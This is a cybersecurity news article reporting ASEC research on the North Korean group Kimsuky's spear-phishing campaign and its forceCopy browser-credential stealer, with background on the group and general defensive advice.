The North Korean state-sponsored hacking group Kimsuky has been actively launching spear-phishing campaigns to distribute a powerful information-stealing malware dubbed forceCopy, according to the latest research from the AhnLab Security Intelligence Center (ASEC).
How Kimsuky Executes the Attack
The attack chain begins with phishing emails containing a malicious Windows shortcut (LNK) file, disguised as a Microsoft Office or PDF document. Once opened, it triggers the execution of PowerShell or mshta.exe—a legitimate Windows binary that runs HTML Application (HTA) files—which subsequently downloads and executes next-stage payloads from an external server.
Malware Deployed in the Attack
According to ASEC, Kimsuky’s attack ultimately results in the deployment of:
PEBBLEDASH – A well-known trojan used for remote access and data exfiltration.
RDP Wrapper – A customized open-source Remote Desktop tool that enables unauthorized remote access.
Proxy malware – Facilitates persistent RDP-based communications between infected systems and external servers.
PowerShell-based keylogger – Captures keystrokes to steal sensitive information.
forceCopy malware – A stealer designed to extract and copy files stored in web browser-related directories.
forceCopy: A Browser Credential Theft Tool
forceCopy specifically targets web browser installation paths, allowing the malware to bypass environmental restrictions and extract stored configuration files, including saved credentials. This shift in tactics underscores Kimsuky’s ongoing adaptation in evading detection and security barriers.
Kimsuky’s Tactical Evolution
By leveraging RDP Wrapper and proxy malware, Kimsuky demonstrates a shift from using traditional bespoke backdoors to more versatile remote access methods. This strategic change enhances their persistence within compromised environments.
Who is Kimsuky?
Also known as APT43, Black Banshee, Emerald Sleet, Sparkling Pisces, Springtail, TA427, and Velvet Chollima, Kimsuky is linked to North Korea’s Reconnaissance General Bureau (RGB)—the nation’s primary foreign intelligence service.
Active since at least 2012, the threat actor specializes in social engineering attacks, often bypassing email security protections. In December 2024, cybersecurity firm Genians reported that Kimsuky had launched phishing campaigns originating from Russian services to conduct credential theft.
Final Thoughts
Kimsuky continues to refine its cyber espionage tactics, utilizing sophisticated phishing techniques, custom malware, and remote access tools to infiltrate and steal sensitive data. As the group evolves, organizations must strengthen their cybersecurity defenses, employ advanced threat detection, and implement multi-factor authentication (MFA) to mitigate the risks posed by these nation-state cyber threats.